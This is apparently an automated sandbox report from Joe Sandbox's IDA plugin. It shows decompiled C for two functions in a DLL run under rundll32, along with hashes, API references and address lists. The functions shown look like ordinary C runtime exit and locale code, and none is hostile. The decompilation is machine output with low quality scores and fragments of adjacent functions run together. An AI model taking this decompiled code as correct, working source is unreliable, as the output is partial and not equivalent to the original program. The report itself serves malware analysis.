Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-$ext-ms-
API String ID: 3177248105-537541572
Opcode ID: 03b412f2dcfeb729a237b2d803d91605f4d356a3e8cd5e5128e68d377a8432c2
Instruction ID: baf72c8e3dffbcae0311709dc34ded704fcdaf485427fd651554a83b46c1da09
Opcode Fuzzy Hash: 03b412f2dcfeb729a237b2d803d91605f4d356a3e8cd5e5128e68d377a8432c2
Instruction Fuzzy Hash: 0DF03030640249B7EF109B61ED46B5A3F99EB506C0FA24430FE0CE84E5EBA2E9519599

Uniqueness

Uniqueness Score: -1.00%

Function 1001070E, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 25%

			E1001070E(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x1004223c(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x10010714
0x10010718
0x10010723
0x1001072b
0x10010736
0x1001073c
0x10010740
0x10010747
0x1001074d
0x1001074d
0x1001074f
0x10010754
0x00000000
0x10010759
0x10010760

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,10010695,?,?,1001065D,00000000,7248FFF6,?), ref: 10010723
GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,10010695,?,?,1001065D,00000000,7248FFF6,?), ref: 10010736
FreeLibrary.KERNEL32(00000000,?,?,10010695,?,?,1001065D,00000000,7248FFF6,?), ref: 10010759

Strings

CorExitProcess, xrefs: 1001072E
mscoree.dll, xrefs: 1001071C

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 50b634fdbf317f93d03933747c97007d475fe10918e8b11ab9f1374748a6aaeb
Instruction ID: afe5ac3e96f71655a5e367b3be99abbbceb1196fcb5638c15691c36776f791ea
Opcode Fuzzy Hash: 50b634fdbf317f93d03933747c97007d475fe10918e8b11ab9f1374748a6aaeb
Instruction Fuzzy Hash: 31F08230B01129FBDB01DB50CE49BDD7BA8DF00791F104060F941E10A0CB70DE40DB99

Uniqueness

Uniqueness Score: -1.00%

Function 100257D6, Relevance: 7.7, APIs: 5, Instructions: 186
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E100257D6(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v60;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				short _v454;
				intOrPtr _v456;
				signed int _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v512;
				char _v536;
				intOrPtr _v540;
				signed int _v544;
				intOrPtr _v548;
				signed int _v560;
				char _v708;
				signed int _v712;
				short _v714;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				intOrPtr _v728;
				signed int _v732;
				intOrPtr _v736;
				signed int* _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v824;
				char _v1252;
				char _v1268;
				intOrPtr _v1284;
				signed int _v1288;
				signed short _v1324;
				void* __ebp;
				signed int _t247;
				void* _t250;
				signed int _t253;
				signed int _t255;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				void* _t268;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t273;
				signed int _t276;
				signed int _t283;
				signed int _t284;
				signed int _t286;
				signed int _t287;
				intOrPtr _t288;
				signed int _t291;
				signed int _t293;
				intOrPtr _t294;
				signed int _t297;
				signed int _t299;
				void* _t300;
				signed int _t306;
				signed int _t307;
				signed int _t309;
				signed int _t310;
				signed int _t326;
				signed int _t328;
				signed int _t330;
				signed int _t334;
				void* _t335;
				signed int _t337;
				void* _t338;
				intOrPtr _t339;
				signed int* _t342;
				signed int _t343;
				signed int _t344;
				intOrPtr* _t349;
				signed int _t363;
				signed int _t365;
				signed int _t367;
				intOrPtr* _t368;
				signed int _t370;
				void* _t375;
				signed int _t379;
				intOrPtr* _t380;
				intOrPtr* _t383;
				void* _t386;
				signed int _t387;
				signed int _t390;
				intOrPtr* _t391;
				intOrPtr _t402;
				intOrPtr* _t403;
				signed int _t405;
				signed int _t410;
				signed int _t411;
				signed int* _t415;
				signed int _t416;
				signed int _t425;
				short _t426;
				signed int _t428;
				intOrPtr _t429;
				signed int _t432;
				intOrPtr _t433;
				signed int _t435;
				signed int _t438;
				intOrPtr _t444;
				signed int _t445;
				signed int _t447;
				signed int _t448;
				signed int _t452;
				signed int _t454;
				signed int _t457;
				signed int* _t458;
				short _t459;
				signed int _t461;
				signed int _t462;
				void* _t464;
				void* _t465;
				signed int _t466;
				void* _t467;
				void* _t468;
				signed int _t469;
				void* _t471;
				void* _t472;
				signed int _t484;

				_t424 = __edx;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t363 = E10024214(0x6a6);
				_t246 = 0;
				_pop(_t375);
				if(_t363 == 0) {
					L20:
					return _t246;
				} else {
					_push(__edi);
					 *_t363 = 1;
					_t428 = _t363 + 4;
					_t444 = _a4;
					 *_t428 = 0;
					_t247 = _t444 + 0x30;
					_push( *_t247);
					_v16 = _t247;
					_push(0x10044e40);
					_push( *0x10044d7c);
					E10025712(_t363, _t375, __edx, _t428, _t444, _t428, 0x351, 3);
					_t465 = _t464 + 0x18;
					_v8 = 0x10044d7c;
					while(1) {
						L2:
						_t250 = E1002F999(_t428, 0x351, 0x10044e3c);
						_t466 = _t465 + 0xc;
						if(_t250 != 0) {
							break;
						} else {
							_t342 = _v16;
							_t415 =  &(_t342[4]);
							_t343 =  *_t342;
							_v16 = _t415;
							_t416 =  *_t415;
							_v20 = _t416;
							goto L4;
						}
						while(1) {
							L4:
							_t424 =  *_t343;
							if(_t424 !=  *_t416) {
								break;
							}
							if(_t424 == 0) {
								L8:
								_t344 = 0;
							} else {
								_t424 =  *((intOrPtr*)(_t343 + 2));
								if(_t424 !=  *((intOrPtr*)(_t416 + 2))) {
									break;
								} else {
									_t343 = _t343 + 4;
									_t416 = _t416 + 4;
									if(_t424 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							_push(_v20);
							_push(0x10044e40);
							asm("sbb eax, eax");
							_v12 = _v12 &  !( ~_t344);
							_t349 = _v8 + 0xc;
							_v8 = _t349;
							_push( *_t349);
							E10025712(_t363, _t416, _t424, _t428, _t444, _t428, 0x351, 3);
							_t465 = _t466 + 0x18;
							if(_v8 < 0x10044dac) {
								goto L2;
							} else {
								if(_v12 != 0) {
									E100268B3(_t363);
									_t435 = _t428 | 0xffffffff;
									__eflags =  *(_t444 + 0x28);
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											E100268B3( *(_t444 + 0x28));
										}
									}
									__eflags =  *(_t444 + 0x24);
									if( *(_t444 + 0x24) != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t435 == 1;
										if(_t435 == 1) {
											E100268B3( *(_t444 + 0x24));
										}
									}
									 *(_t444 + 0x24) = 0;
									 *(_t444 + 0x1c) = 0;
									 *(_t444 + 0x28) = 0;
									 *((intOrPtr*)(_t444 + 0x20)) = 0;
									_t246 =  *((intOrPtr*)(_t444 + 0x40));
								} else {
									_t438 = _t428 | 0xffffffff;
									_t484 =  *(_t444 + 0x28);
									if(_t484 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t484 == 0) {
											E100268B3( *(_t444 + 0x28));
										}
									}
									if( *(_t444 + 0x24) != 0) {
										asm("lock xadd [eax], edi");
										if(_t438 == 1) {
											E100268B3( *(_t444 + 0x24));
										}
									}
									 *(_t444 + 0x24) =  *(_t444 + 0x24) & 0x00000000;
									_t246 = _t363 + 4;
									 *(_t444 + 0x1c) =  *(_t444 + 0x1c) & 0x00000000;
									 *(_t444 + 0x28) = _t363;
									 *((intOrPtr*)(_t444 + 0x20)) = _t246;
								}
								goto L20;
							}
							goto L135;
						}
						asm("sbb eax, eax");
						_t344 = _t343 | 0x00000001;
						__eflags = _t344;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E1000E341();
					asm("int3");
					_t461 = _t466;
					_t467 = _t466 - 0x1d0;
					_t253 =  *0x1004d054; // 0x940b3682
					_v60 = _t253 ^ _t461;
					_t255 = _v44;
					_push(_t363);
					_push(_t444);
					_t445 = _v40;
					_push(_t428);
					_t429 = _v48;
					_v512 = _t429;
					__eflags = _t255;
					if(_t255 == 0) {
						_v460 = 1;
						_v472 = 0;
						_t365 = 0;
						_v452 = 0;
						__eflags = _t445;
						if(__eflags == 0) {
							L79:
							_t255 = E100257D6(_t365, _t424, _t429, _t445, __eflags, _t429);
							goto L80;
						} else {
							__eflags =  *_t445 - 0x4c;
							if( *_t445 != 0x4c) {
								L59:
								_t255 = E100250E8(_t424, _t445,  &_v276, 0x83,  &_v448, 0x55,  &_v468);
								_t468 = _t467 + 0x18;
								__eflags = _t255;
								if(_t255 != 0) {
									_t379 = 0;
									__eflags = 0;
									_t425 = _t429 + 0x20;
									_t447 = 0;
									_v452 = _t425;
									do {
										__eflags = _t447;
										if(_t447 == 0) {
											L74:
											_t261 = _v460;
										} else {
											_t380 =  *_t425;
											_t262 =  &_v276;
											while(1) {
												__eflags =  *_t262 -  *_t380;
												_t429 = _v464;
												if( *_t262 !=  *_t380) {
													break;
												}
												__eflags =  *_t262;
												if( *_t262 == 0) {
													L67:
													_t379 = 0;
													_t263 = 0;
												} else {
													_t426 =  *((intOrPtr*)(_t262 + 2));
													__eflags = _t426 -  *((intOrPtr*)(_t380 + 2));
													_v454 = _t426;
													_t425 = _v452;
													if(_t426 !=  *((intOrPtr*)(_t380 + 2))) {
														break;
													} else {
														_t262 = _t262 + 4;
														_t380 = _t380 + 4;
														__eflags = _v454;
														if(_v454 != 0) {
															continue;
														} else {
															goto L67;
														}
													}
												}
												L69:
												__eflags = _t263;
												if(_t263 == 0) {
													_t365 = _t365 + 1;
													__eflags = _t365;
													goto L74;
												} else {
													_t264 =  &_v276;
													_push(_t264);
													_push(_t447);
													_push(_t429);
													L83();
													_t425 = _v452;
													_t468 = _t468 + 0xc;
													__eflags = _t264;
													if(_t264 == 0) {
														_t379 = 0;
														_t261 = 0;
														_v460 = 0;
													} else {
														_t365 = _t365 + 1;
														_t379 = 0;
														goto L74;
													}
												}
												goto L75;
											}
											asm("sbb eax, eax");
											_t263 = _t262 | 0x00000001;
											_t379 = 0;
											__eflags = 0;
											goto L69;
										}
										L75:
										_t447 = _t447 + 1;
										_t425 = _t425 + 0x10;
										_v452 = _t425;
										__eflags = _t447 - 5;
									} while (_t447 <= 5);
									__eflags = _t261;
									if(__eflags != 0) {
										goto L79;
									} else {
										__eflags = _t365;
										if(__eflags != 0) {
											goto L79;
										} else {
											_t255 = _t379;
										}
									}
								}
								goto L80;
							} else {
								__eflags =  *(_t445 + 2) - 0x43;
								if( *(_t445 + 2) != 0x43) {
									goto L59;
								} else {
									__eflags =  *((short*)(_t445 + 4)) - 0x5f;
									if( *((short*)(_t445 + 4)) != 0x5f) {
										goto L59;
									} else {
										while(1) {
											_t265 = E1002FC2F(_t445, 0x10044e34);
											_t367 = _t265;
											_v468 = _t367;
											_pop(_t382);
											__eflags = _t367;
											if(_t367 == 0) {
												break;
											}
											_t266 = _t265 - _t445;
											__eflags = _t266;
											_v460 = _t266 >> 1;
											if(_t266 == 0) {
												break;
											} else {
												_t268 = 0x3b;
												__eflags =  *_t367 - _t268;
												if( *_t367 == _t268) {
													break;
												} else {
													_t432 = _v460;
													_t368 = 0x10044d7c;
													_v456 = 1;
													do {
														_t269 = E10023828( *_t368, _t445, _t432);
														_t467 = _t467 + 0xc;
														__eflags = _t269;
														if(_t269 != 0) {
															goto L45;
														} else {
															_t383 =  *_t368;
															_t424 = _t383 + 2;
															do {
																_t339 =  *_t383;
																_t383 = _t383 + 2;
																__eflags = _t339 - _v472;
															} while (_t339 != _v472);
															_t382 = _t383 - _t424 >> 1;
															__eflags = _t432 - _t383 - _t424 >> 1;
															if(_t432 != _t383 - _t424 >> 1) {
																goto L45;
															}
														}
														break;
														L45:
														_v456 = _v456 + 1;
														_t368 = _t368 + 0xc;
														__eflags = _t368 - 0x10044dac;
													} while (_t368 <= 0x10044dac);
													_t365 = _v468 + 2;
													_t270 = E1002FBD6(_t382, _t365, 0x10044e3c);
													_t429 = _v464;
													_t448 = _t270;
													_pop(_t386);
													__eflags = _t448;
													if(_t448 != 0) {
														L48:
														__eflags = _v456 - 5;
														if(_v456 > 5) {
															_t387 = _v452;
															goto L54;
														} else {
															_push(_t448);
															_t273 = E1002FBCB( &_v276, 0x83, _t365);
															_t469 = _t467 + 0x10;
															__eflags = _t273;
															if(_t273 != 0) {
																L82:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E1000E341();
																asm("int3");
																_push(_t461);
																_t462 = _t469;
																_t276 =  *0x1004d054; // 0x940b3682
																_v560 = _t276 ^ _t462;
																_push(_t365);
																_t370 = _v544;
																_push(_t448);
																_push(_t429);
																_t433 = _v548;
																_v1288 = _t370;
																_v1284 = E10023FB6(_t386, _t424) + 0x278;
																_t283 = E100250E8(_t424, _v540,  &_v824, 0x83,  &_v1252, 0x55,  &_v1268);
																_t471 = _t469 - 0x2e4 + 0x18;
																__eflags = _t283;
																if(_t283 == 0) {
																	L122:
																	_t284 = 0;
																	__eflags = 0;
																	goto L123;
																} else {
																	_t103 = _t370 + 2; // 0x2
																	_t452 = _t103 << 4;
																	__eflags = _t452;
																	_t286 =  &_v280;
																	_v720 = _t452;
																	_t424 =  *(_t452 + _t433);
																	_t390 = _t424;
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t286 -  *_t390;
																		_t454 = _v720;
																		if( *_t286 !=  *_t390) {
																			break;
																		}
																		__eflags =  *_t286;
																		if( *_t286 == 0) {
																			L89:
																			_t287 = _v712;
																		} else {
																			_t459 =  *((intOrPtr*)(_t286 + 2));
																			__eflags = _t459 -  *((intOrPtr*)(_t390 + 2));
																			_v714 = _t459;
																			_t454 = _v720;
																			if(_t459 !=  *((intOrPtr*)(_t390 + 2))) {
																				break;
																			} else {
																				_t286 = _t286 + 4;
																				_t390 = _t390 + 4;
																				__eflags = _v714;
																				if(_v714 != 0) {
																					continue;
																				} else {
																					goto L89;
																				}
																			}
																		}
																		L91:
																		__eflags = _t287;
																		if(_t287 != 0) {
																			_t391 =  &_v280;
																			_t424 = _t391 + 2;
																			do {
																				_t288 =  *_t391;
																				_t391 = _t391 + 2;
																				__eflags = _t288 - _v712;
																			} while (_t288 != _v712);
																			_v716 = (_t391 - _t424 >> 1) + 1;
																			_t291 = E10024214(4 + ((_t391 - _t424 >> 1) + 1) * 2);
																			_v732 = _t291;
																			__eflags = _t291;
																			if(_t291 == 0) {
																				goto L122;
																			} else {
																				_v728 =  *((intOrPtr*)(_t454 + _t433));
																				_v748 =  *(_t433 + 0xa0 + _t370 * 4);
																				_v752 =  *(_t433 + 8);
																				_v736 = _t291 + 4;
																				_t293 = E10028A30(_t291 + 4, _v716,  &_v280);
																				_t472 = _t471 + 0xc;
																				__eflags = _t293;
																				if(_t293 != 0) {
																					_t294 = _v736;
																					_push(_t294);
																					_push(_t294);
																					_push(_t294);
																					_push(_t294);
																					_push(_t294);
																					E1000E341();
																					asm("int3");
																					_push(_t462);
																					_t297 = (_v1324 & 0x0000ffff) - 0x2d;
																					__eflags = _t297;
																					if(_t297 == 0) {
																						L134:
																						__eflags = 0;
																						return 0;
																					} else {
																						_t299 = _t297 - 1;
																						__eflags = _t299;
																						if(_t299 == 0) {
																							_t300 = 2;
																							return _t300;
																						} else {
																							__eflags = _t299 == 0x31;
																							if(_t299 == 0x31) {
																								goto L134;
																							} else {
																								__eflags = 1;
																								return 1;
																							}
																						}
																					}
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t454 + _t433)) = _v736;
																					if(_v280 != 0x43) {
																						L100:
																						_t306 = E10024D73(_t370, _t433,  &_v708);
																						_t424 = _v712;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L100;
																						} else {
																							_t424 = _v712;
																							_t306 = _t424;
																						}
																					}
																					 *(_t433 + 0xa0 + _t370 * 4) = _t306;
																					__eflags = _t370 - 2;
																					if(_t370 != 2) {
																						__eflags = _t370 - 1;
																						if(_t370 != 1) {
																							__eflags = _t370 - 5;
																							if(_t370 == 5) {
																								 *((intOrPtr*)(_t433 + 0x14)) = _v724;
																							}
																						} else {
																							 *((intOrPtr*)(_t433 + 0x10)) = _v724;
																						}
																					} else {
																						_t458 = _v740;
																						 *(_t433 + 8) = _v724;
																						_v716 = _t458[8];
																						_t410 = _t458[9];
																						_v724 = _t410;
																						while(1) {
																							__eflags =  *(_t433 + 8) -  *(_t458 + _t424 * 8);
																							if( *(_t433 + 8) ==  *(_t458 + _t424 * 8)) {
																								break;
																							}
																							_t334 =  *(_t458 + _t424 * 8);
																							_t410 =  *(_t458 + 4 + _t424 * 8);
																							 *(_t458 + _t424 * 8) = _v716;
																							 *(_t458 + 4 + _t424 * 8) = _v724;
																							_t424 = _t424 + 1;
																							_t370 = _v744;
																							_v716 = _t334;
																							_v724 = _t410;
																							__eflags = _t424 - 5;
																							if(_t424 < 5) {
																								continue;
																							} else {
																							}
																							L108:
																							__eflags = _t424 - 5;
																							if(__eflags == 0) {
																								_t326 = E1002E537(_t424, __eflags, _v712, 1, 0x10044cf0, 0x7f,  &_v536,  *(_t433 + 8), 1);
																								_t472 = _t472 + 0x1c;
																								__eflags = _t326;
																								if(_t326 == 0) {
																									_t411 = _v712;
																								} else {
																									_t328 = _v712;
																									do {
																										 *(_t462 + _t328 * 2 - 0x20c) =  *(_t462 + _t328 * 2 - 0x20c) & 0x000001ff;
																										_t328 = _t328 + 1;
																										__eflags = _t328 - 0x7f;
																									} while (_t328 < 0x7f);
																									_t330 = E1003FDBF( &_v536,  *0x1004d0b4, 0xfe);
																									_t472 = _t472 + 0xc;
																									__eflags = _t330;
																									_t411 = 0 | _t330 == 0x00000000;
																								}
																								_t458[1] = _t411;
																								 *_t458 =  *(_t433 + 8);
																							}
																							 *(_t433 + 0x18) = _t458[1];
																							goto L120;
																						}
																						__eflags = _t424;
																						if(_t424 != 0) {
																							 *_t458 =  *(_t458 + _t424 * 8);
																							_t458[1] =  *(_t458 + 4 + _t424 * 8);
																							 *(_t458 + _t424 * 8) = _v716;
																							 *(_t458 + 4 + _t424 * 8) = _t410;
																						}
																						goto L108;
																					}
																					L120:
																					_t307 = _t370 * 0xc;
																					_t204 = _t307 + 0x10044d78; // 0x100245b6
																					 *0x1004223c(_t433);
																					_t309 =  *((intOrPtr*)( *_t204))();
																					_t402 = _v728;
																					__eflags = _t309;
																					if(_t309 == 0) {
																						__eflags = _t402 - 0x1004d178;
																						if(_t402 == 0x1004d178) {
																							L127:
																							_t310 = _v720;
																						} else {
																							_t457 = _t370 + _t370;
																							__eflags = _t457;
																							asm("lock xadd [eax], ecx");
																							if(_t457 != 0) {
																								goto L127;
																							} else {
																								E100268B3( *((intOrPtr*)(_t433 + 0x28 + _t457 * 8)));
																								E100268B3( *((intOrPtr*)(_t433 + 0x24 + _t457 * 8)));
																								E100268B3( *(_t433 + 0xa0 + _t370 * 4));
																								_t310 = _v720;
																								_t405 = _v712;
																								 *(_t310 + _t433) = _t405;
																								 *(_t433 + 0xa0 + _t370 * 4) = _t405;
																							}
																						}
																						_t403 = _v732;
																						 *_t403 = 1;
																						_t284 =  *(_t310 + _t433);
																						 *((intOrPtr*)(_t433 + 0x28 + (_t370 + _t370) * 8)) = _t403;
																					} else {
																						 *((intOrPtr*)(_v720 + _t433)) = _t402;
																						E100268B3( *(_t433 + 0xa0 + _t370 * 4));
																						 *(_t433 + 0xa0 + _t370 * 4) = _v748;
																						E100268B3(_v732);
																						 *(_t433 + 8) = _v752;
																						goto L122;
																					}
																					goto L123;
																				}
																			}
																		} else {
																			_t284 = _t424;
																			L123:
																			__eflags = _v16 ^ _t462;
																			return E100037EA(_t284, _v16 ^ _t462, _t424);
																		}
																		goto L135;
																	}
																	asm("sbb eax, eax");
																	_t287 = _t286 | 0x00000001;
																	__eflags = _t287;
																	goto L91;
																}
															} else {
																_t335 = _t448 + _t448;
																__eflags = _t335 - 0x106;
																if(_t335 >= 0x106) {
																	E10004292();
																	goto L82;
																} else {
																	 *((short*)(_t461 + _t335 - 0x10c)) = 0;
																	_t337 =  &_v276;
																	_push(_t337);
																	_push(_v456);
																	_push(_t429);
																	L83();
																	_t387 = _v452;
																	_t467 = _t469 + 0xc;
																	__eflags = _t337;
																	if(_t337 != 0) {
																		_t387 = _t387 + 1;
																		_v452 = _t387;
																	}
																	L54:
																	_t445 = _t365 + _t448 * 2;
																	_t271 =  *_t445 & 0x0000ffff;
																	_t424 = _t271;
																	__eflags = _t271;
																	if(_t271 != 0) {
																		_t445 = _t445 + 2;
																		__eflags = _t445;
																		_t424 =  *_t445 & 0x0000ffff;
																	}
																	__eflags = _t424;
																	if(_t424 != 0) {
																		continue;
																	} else {
																		__eflags = _t387;
																		if(__eflags != 0) {
																			goto L79;
																		} else {
																			break;
																		}
																		goto L80;
																	}
																}
															}
														}
													} else {
														_t338 = 0x3b;
														__eflags =  *_t365 - _t338;
														if( *_t365 != _t338) {
															break;
														} else {
															goto L48;
														}
													}
												}
											}
											goto L135;
										}
										_t255 = 0;
										goto L80;
									}
								}
							}
						}
					} else {
						__eflags = _t445;
						if(_t445 == 0) {
							_t255 =  *(_t429 + (_t255 + 2 + _t255 + 2) * 8);
						} else {
							_push(_t445);
							_push(_t255);
							_push(_t429);
							L83();
						}
						L80:
						__eflags = _v12 ^ _t461;
						return E100037EA(_t255, _v12 ^ _t461, _t424);
					}
				}
				L135:
			}

0x100257d6
0x100257de
0x100257df
0x100257e8
0x100257f0
0x100257f2
0x100257f4
0x100257f7
0x10025914
0x10025917
0x100257fd
0x100257fd
0x100257fe
0x10025800
0x10025803
0x10025806
0x10025809
0x1002580c
0x1002580e
0x10025811
0x10025816
0x10025824
0x1002582e
0x10025831
0x10025834
0x10025834
0x1002583f
0x10025844
0x10025849
0x00000000
0x1002584f
0x1002584f
0x10025852
0x10025855
0x10025857
0x1002585a
0x1002585c
0x1002585c
0x1002585c
0x1002585f
0x1002585f
0x1002585f
0x10025865
0x00000000
0x00000000
0x1002586a
0x10025881
0x10025881
0x1002586c
0x1002586c
0x10025874
0x00000000
0x10025876
0x10025876
0x10025879
0x1002587f
0x00000000
0x00000000
0x00000000
0x00000000
0x1002587f
0x10025874
0x1002588a
0x1002588a
0x1002588f
0x10025894
0x10025898
0x100258a4
0x100258a7
0x100258aa
0x100258b4
0x100258bc
0x100258c4
0x00000000
0x100258ca
0x100258ce
0x10025919
0x10025922
0x10025925
0x10025927
0x1002592b
0x1002592f
0x10025934
0x10025939
0x1002592f
0x1002593d
0x1002593f
0x10025941
0x10025945
0x10025946
0x1002594b
0x10025950
0x10025946
0x10025953
0x10025956
0x10025959
0x1002595c
0x1002595f
0x100258d0
0x100258d3
0x100258d6
0x100258d8
0x100258dc
0x100258e0
0x100258e5
0x100258ea
0x100258e0
0x100258f0
0x100258f2
0x100258f7
0x100258fc
0x10025901
0x100258f7
0x10025902
0x10025906
0x10025909
0x1002590d
0x10025910
0x10025910
0x00000000
0x10025913
0x00000000
0x100258c4
0x10025885
0x10025887
0x10025887
0x00000000
0x10025887
0x10025966
0x10025967
0x10025968
0x10025969
0x1002596a
0x1002596b
0x10025970
0x10025974
0x10025976
0x1002597c
0x10025983
0x10025986
0x10025989
0x1002598a
0x1002598b
0x1002598e
0x1002598f
0x10025992
0x10025998
0x1002599a
0x100259bf
0x100259c9
0x100259cf
0x100259d1
0x100259d7
0x100259d9
0x10025c39
0x10025c3a
0x00000000
0x100259df
0x100259df
0x100259e3
0x10025b51
0x10025b6e
0x10025b73
0x10025b76
0x10025b78
0x10025b7e
0x10025b7e
0x10025b80
0x10025b83
0x10025b85
0x10025b8b
0x10025b8b
0x10025b8d
0x10025c14
0x10025c14
0x10025b93
0x10025b93
0x10025b95
0x10025b9b
0x10025b9e
0x10025ba1
0x10025ba7
0x00000000
0x00000000
0x10025ba9
0x10025bad
0x10025bd6
0x10025bd6
0x10025bd8
0x10025baf
0x10025baf
0x10025bb3
0x10025bb7
0x10025bbe
0x10025bc4
0x00000000
0x10025bc6
0x10025bc6
0x10025bc9
0x10025bcc
0x10025bd4
0x00000000
0x00000000
0x00000000
0x00000000
0x10025bd4
0x10025bc4
0x10025be3
0x10025be3
0x10025be5
0x10025c13
0x10025c13
0x00000000
0x10025be7
0x10025be7
0x10025bed
0x10025bee
0x10025bef
0x10025bf0
0x10025bf5
0x10025bfb
0x10025bfe
0x10025c00
0x10025c07
0x10025c09
0x10025c0b
0x10025c02
0x10025c02
0x10025c03
0x00000000
0x10025c03
0x10025c00
0x00000000
0x10025be5
0x10025bdc
0x10025bde
0x10025be1
0x10025be1
0x00000000
0x10025be1
0x10025c1a
0x10025c1a
0x10025c1b
0x10025c1e
0x10025c24
0x10025c24
0x10025c2d
0x10025c2f
0x00000000
0x10025c31
0x10025c31
0x10025c33
0x00000000
0x10025c35
0x10025c35
0x10025c35
0x10025c33
0x10025c2f
0x00000000
0x100259e9
0x100259e9
0x100259ee
0x00000000
0x100259f4
0x100259f4
0x100259f9
0x00000000
0x100259ff
0x100259ff
0x10025a05
0x10025a0a
0x10025a0c
0x10025a13
0x10025a14
0x10025a16
0x00000000
0x00000000
0x10025a1c
0x10025a1c
0x10025a20
0x10025a26
0x00000000
0x10025a2c
0x10025a2e
0x10025a2f
0x10025a32
0x00000000
0x10025a38
0x10025a38
0x10025a3e
0x10025a43
0x10025a4d
0x10025a51
0x10025a56
0x10025a59
0x10025a5b
0x00000000
0x10025a5d
0x10025a5d
0x10025a5f
0x10025a62
0x10025a62
0x10025a65
0x10025a68
0x10025a68
0x10025a73
0x10025a75
0x10025a77
0x00000000
0x00000000
0x10025a77
0x00000000
0x10025a79
0x10025a79
0x10025a7f
0x10025a82
0x10025a82
0x10025a90
0x10025a99
0x10025a9e
0x10025aa4
0x10025aa7
0x10025aa8
0x10025aaa
0x10025ab8
0x10025ab8
0x10025abf
0x10025b20
0x00000000
0x10025ac1
0x10025ac1
0x10025acf
0x10025ad4
0x10025ad7
0x10025ad9
0x10025c54
0x10025c56
0x10025c57
0x10025c58
0x10025c59
0x10025c5a
0x10025c5b
0x10025c60
0x10025c63
0x10025c64
0x10025c6c
0x10025c73
0x10025c76
0x10025c77
0x10025c7a
0x10025c7e
0x10025c7f
0x10025c82
0x10025c92
0x10025cb5
0x10025cba
0x10025cbd
0x10025cbf
0x10025f75
0x10025f75
0x10025f75
0x00000000
0x10025cc5
0x10025cc5
0x10025cc8
0x10025cc8
0x10025ccb
0x10025cd1
0x10025cd7
0x10025cda
0x10025cdc
0x10025cdf
0x10025ce6
0x10025ce9
0x10025cef
0x00000000
0x00000000
0x10025cf1
0x10025cf5
0x10025d1e
0x10025d1e
0x10025cf7
0x10025cf7
0x10025cfb
0x10025cff
0x10025d06
0x10025d0c
0x00000000
0x10025d0e
0x10025d0e
0x10025d11
0x10025d14
0x10025d1c
0x00000000
0x00000000
0x00000000
0x00000000
0x10025d1c
0x10025d0c
0x10025d2b
0x10025d2b
0x10025d2d
0x10025d36
0x10025d3c
0x10025d3f
0x10025d3f
0x10025d42
0x10025d45
0x10025d45
0x10025d55
0x10025d63
0x10025d68
0x10025d6f
0x10025d71
0x00000000
0x10025d77
0x10025d7d
0x10025d8a
0x10025d93
0x10025da6
0x10025dad
0x10025db2
0x10025db5
0x10025db7
0x10025ff5
0x10025ffb
0x10025ffc
0x10025ffd
0x10025ffe
0x10025fff
0x10026000
0x10026005
0x10026008
0x1002600f
0x1002600f
0x10026012
0x10026028
0x10026028
0x1002602b
0x10026014
0x10026014
0x10026014
0x10026017
0x10026025
0x10026027
0x10026019
0x10026019
0x1002601c
0x00000000
0x1002601e
0x10026020
0x10026022
0x10026022
0x1002601c
0x10026017
0x10025dbd
0x10025dbd
0x10025dcb
0x10025dce
0x10025de4
0x10025deb
0x10025df0
0x10025dd0
0x10025dd0
0x10025dd8
0x00000000
0x10025dda
0x10025dda
0x10025de0
0x10025de0
0x10025dd8
0x10025df7
0x10025dfe
0x10025e01
0x10025eff
0x10025f02
0x10025f0f
0x10025f12
0x10025f1a
0x10025f1a
0x10025f04
0x10025f0a
0x10025f0a
0x10025e07
0x10025e07
0x10025e13
